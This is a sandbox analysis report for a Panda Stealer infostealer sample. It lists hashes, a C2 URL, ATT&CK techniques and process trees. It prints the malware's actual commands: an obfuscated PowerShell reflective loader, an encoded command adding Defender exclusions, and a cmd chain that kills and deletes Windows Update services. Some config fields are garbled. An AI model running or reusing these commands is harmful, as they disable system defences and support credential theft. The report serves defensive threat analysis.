pandastealer | abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273

Analysis

max time kernel
80s
max time network
125s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
23-11-2023 03:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273.exe
Size

24.8MB
MD5

2a7a396903e48cf898f8e9c6c77a875d
SHA1

6547cbb2947e005c9ea42539107b98db8b9c77d7
SHA256

abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273
SHA512

63689d85ae71a1a703d58b16b5c45891c8048e1eb63252b105eee640b5923f7ac882ab767f7cc3089e0b919d7e6a826d5c6220fb1d7dee4ea284e2f172b1e189
SSDEEP

393216:F8QZskDN3u5yyHTV7JDL9a+43tFuUiuJzuFfTy1J4uz4SfPIY:F8QZsudeDL9n43X9iuNWTS9X3

Score

10^/10

pandastealer discovery evasion exploit spyware stealer

Malware Config

Extracted

Family

pandastealer

Version

:�=��^V��p��X7��E|^�fh�8v��4��ok)�E�B�u�:�,�=M懼:AGd�.�eM�w��̻��*

http://�p��X7��E|^�fh�8v��4��ok)�E�B�u�:�,�=M懼:AGd�.�eM�w��̻��*

Extracted

Family

pandastealer

Version

1.11

http://f0854165.xsph.ru

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Panda Stealer payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1412-0-0x0000000000400000-0x0000000001CCA000-memory.dmp	family_pandastealer
C:\Users\Admin\AppData\Local\Temp\lrucache.exe	family_pandastealer
C:\Users\Admin\AppData\Local\Temp\lrucache.exe	family_pandastealer
\Users\Admin\AppData\Local\Temp\lrucache.exe	family_pandastealer
\Users\Admin\AppData\Local\Temp\lrucache.exe	family_pandastealer

PandaStealer
Panda Stealer is a fork of CollectorProject Stealer written in C++.
stealer pandastealer
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1252 created 420 1252 powershell.EXE winlogon.exe
PID 1144 created 420 1144 powershell.EXE winlogon.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exetakeown.exeicacls.exe

pid process

2964 icacls.exe
1112 takeown.exe
1940 takeown.exe
792 icacls.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

Reg.Organizer.v9.11.exelrucache.exeWCCNativeUpdate.exeWCCNativeHost.exe

pid process

2844 Reg.Organizer.v9.11.exe
2720 lrucache.exe
3020 WCCNativeUpdate.exe
1020 WCCNativeHost.exe
Loads dropped DLL 7 IoCs

Processes:

schtasks.exeReg.Organizer.v9.11.exetaskeng.exe

pid process

1412 schtasks.exe
1412 schtasks.exe
1412 schtasks.exe
1412 schtasks.exe
2844 Reg.Organizer.v9.11.exe
2844 Reg.Organizer.v9.11.exe
2388 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exetakeown.exeicacls.exe

pid process

2964 icacls.exe
1112 takeown.exe
1940 takeown.exe
792 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	pid	process	target process
PID 1252 created 420	1252	powershell.EXE	winlogon.exe
PID 1144 created 420	1144	powershell.EXE	winlogon.exe

pid	process
2964	icacls.exe
1112	takeown.exe
1940	takeown.exe
792	icacls.exe

pid	process
2844	Reg.Organizer.v9.11.exe
2720	lrucache.exe
3020	WCCNativeUpdate.exe
1020	WCCNativeHost.exe

pid	process
1412	schtasks.exe
1412	schtasks.exe
1412	schtasks.exe
1412	schtasks.exe
2844	Reg.Organizer.v9.11.exe
2844	Reg.Organizer.v9.11.exe
2388	taskeng.exe

pid	process
2964	icacls.exe
1112	takeown.exe
1940	takeown.exe
792	icacls.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exeWMIADAP.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	WMIADAP.EXE
File opened for modification	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WMIADAP.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

WCCNativeUpdate.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 3020 set thread context of 2156	3020	WCCNativeUpdate.exe	conhost.exe
PID 1252 set thread context of 1176	1252	powershell.EXE	dllhost.exe
PID 1144 set thread context of 1996	1144	powershell.EXE	dllhost.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2448 sc.exe
2232 sc.exe
1708 sc.exe
768 sc.exe
2604 sc.exe
1628 sc.exe
1720 sc.exe
2016 sc.exe
952 sc.exe
2108 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2068 schtasks.exe

pid	process
2448	sc.exe
2232	sc.exe
1708	sc.exe
768	sc.exe
2604	sc.exe
1628	sc.exe
1720	sc.exe
2016	sc.exe
952	sc.exe
2108	sc.exe

pid	process
2068	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

WCCNativeHost.exepowershell.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WCCNativeHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e094347ebb1dda01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WCCNativeHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WCCNativeHost.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
2652	reg.exe
1104	reg.exe
1680	reg.exe
2500	reg.exe
536	reg.exe
596	reg.exe
2708	reg.exe
2472	reg.exe
2640	reg.exe
1604	reg.exe
2940	reg.exe
2868	reg.exe
2332	reg.exe
2980	reg.exe
472	reg.exe
2932	reg.exe
2832	reg.exe
2540	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

lrucache.exepowershell.exeWCCNativeUpdate.exepowershell.EXEdllhost.exepowershell.EXE

pid	process
2720	lrucache.exe
1372	powershell.exe
3020	WCCNativeUpdate.exe
1252	powershell.EXE
1252	powershell.EXE
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1144	powershell.EXE
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe
1176	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeschtasks.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeWCCNativeUpdate.exepowershell.EXEdllhost.exesvchost.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeShutdownPrivilege	1844	schtasks.exe
Token: SeShutdownPrivilege	1948	powercfg.exe
Token: SeShutdownPrivilege	584	powercfg.exe
Token: SeShutdownPrivilege	436	powercfg.exe
Token: SeTakeOwnershipPrivilege	1112	takeown.exe
Token: SeDebugPrivilege	3020	WCCNativeUpdate.exe
Token: SeDebugPrivilege	1252	powershell.EXE
Token: SeDebugPrivilege	1252	powershell.EXE
Token: SeDebugPrivilege	1176	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeDebugPrivilege	1144	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

conhost.execonhost.exe

pid process

2932 conhost.exe
2424 conhost.exe

pid	process
2932	conhost.exe
2424	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

schtasks.exeWCCNativeUpdate.execmd.execmd.exe

description	pid	process	target process
PID 1412 wrote to memory of 2844	1412	schtasks.exe	Reg.Organizer.v9.11.exe
PID 1412 wrote to memory of 2844	1412	schtasks.exe	Reg.Organizer.v9.11.exe
PID 1412 wrote to memory of 2844	1412	schtasks.exe	Reg.Organizer.v9.11.exe
PID 1412 wrote to memory of 2844	1412	schtasks.exe	Reg.Organizer.v9.11.exe
PID 1412 wrote to memory of 2720	1412	schtasks.exe	lrucache.exe
PID 1412 wrote to memory of 2720	1412	schtasks.exe	lrucache.exe
PID 1412 wrote to memory of 2720	1412	schtasks.exe	lrucache.exe
PID 1412 wrote to memory of 2720	1412	schtasks.exe	lrucache.exe
PID 1412 wrote to memory of 3020	1412	schtasks.exe	WCCNativeUpdate.exe
PID 1412 wrote to memory of 3020	1412	schtasks.exe	WCCNativeUpdate.exe
PID 1412 wrote to memory of 3020	1412	schtasks.exe	WCCNativeUpdate.exe
PID 1412 wrote to memory of 3020	1412	schtasks.exe	WCCNativeUpdate.exe
PID 3020 wrote to memory of 1372	3020	WCCNativeUpdate.exe	powershell.exe
PID 3020 wrote to memory of 1372	3020	WCCNativeUpdate.exe	powershell.exe
PID 3020 wrote to memory of 1372	3020	WCCNativeUpdate.exe	powershell.exe
PID 3020 wrote to memory of 2532	3020	WCCNativeUpdate.exe	cmd.exe
PID 3020 wrote to memory of 2532	3020	WCCNativeUpdate.exe	cmd.exe
PID 3020 wrote to memory of 2532	3020	WCCNativeUpdate.exe	cmd.exe
PID 3020 wrote to memory of 1828	3020	WCCNativeUpdate.exe	cmd.exe
PID 3020 wrote to memory of 1828	3020	WCCNativeUpdate.exe	cmd.exe
PID 3020 wrote to memory of 1828	3020	WCCNativeUpdate.exe	cmd.exe
PID 2532 wrote to memory of 768	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 768	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 768	2532	cmd.exe	sc.exe
PID 1828 wrote to memory of 1844	1828	cmd.exe	schtasks.exe
PID 1828 wrote to memory of 1844	1828	cmd.exe	schtasks.exe
PID 1828 wrote to memory of 1844	1828	cmd.exe	schtasks.exe
PID 2532 wrote to memory of 1720	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 1720	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 1720	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 2016	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 2016	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 2016	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 1708	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 1708	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 1708	2532	cmd.exe	sc.exe
PID 1828 wrote to memory of 1948	1828	cmd.exe	powercfg.exe
PID 1828 wrote to memory of 1948	1828	cmd.exe	powercfg.exe
PID 1828 wrote to memory of 1948	1828	cmd.exe	powercfg.exe
PID 2532 wrote to memory of 2232	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 2232	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 2232	2532	cmd.exe	sc.exe
PID 2532 wrote to memory of 596	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 596	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 596	2532	cmd.exe	reg.exe
PID 1828 wrote to memory of 584	1828	cmd.exe	powercfg.exe
PID 1828 wrote to memory of 584	1828	cmd.exe	powercfg.exe
PID 1828 wrote to memory of 584	1828	cmd.exe	powercfg.exe
PID 2532 wrote to memory of 472	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 472	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 472	2532	cmd.exe	reg.exe
PID 1828 wrote to memory of 436	1828	cmd.exe	powercfg.exe
PID 1828 wrote to memory of 436	1828	cmd.exe	powercfg.exe
PID 1828 wrote to memory of 436	1828	cmd.exe	powercfg.exe
PID 2532 wrote to memory of 536	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 536	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 536	2532	cmd.exe	reg.exe
PID 2532 wrote to memory of 2500	2532	cmd.exe	powercfg.exe
PID 2532 wrote to memory of 2500	2532	cmd.exe	powercfg.exe
PID 2532 wrote to memory of 2500	2532	cmd.exe	powercfg.exe
PID 3020 wrote to memory of 2156	3020	WCCNativeUpdate.exe	conhost.exe
PID 3020 wrote to memory of 2156	3020	WCCNativeUpdate.exe	conhost.exe
PID 3020 wrote to memory of 2156	3020	WCCNativeUpdate.exe	conhost.exe
PID 2532 wrote to memory of 2472	2532	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\system32\taskeng.exe
taskeng.exe {406E4B46-2AE4-4A54-BEF2-0E7BC4A24A2E} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:2388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBsAGYAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBjACMAPgA="
5⤵
- Drops file in System32 directory
PID:2696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2940

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:2604

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:952

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1628

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:2108

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:2448

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:2832

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:2540

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:2652

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1104

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:2980

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1940

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:792

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1680

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2332

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1604

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:584

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:1368

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:1080

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:2188

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:2644

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1664

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:2420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:2076

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
PID:1792

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
PID:1924

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
PID:2500

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:1488

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "ecbnmucinqopk"
5⤵
PID:2692

C:\Windows\System32\dialer.exe
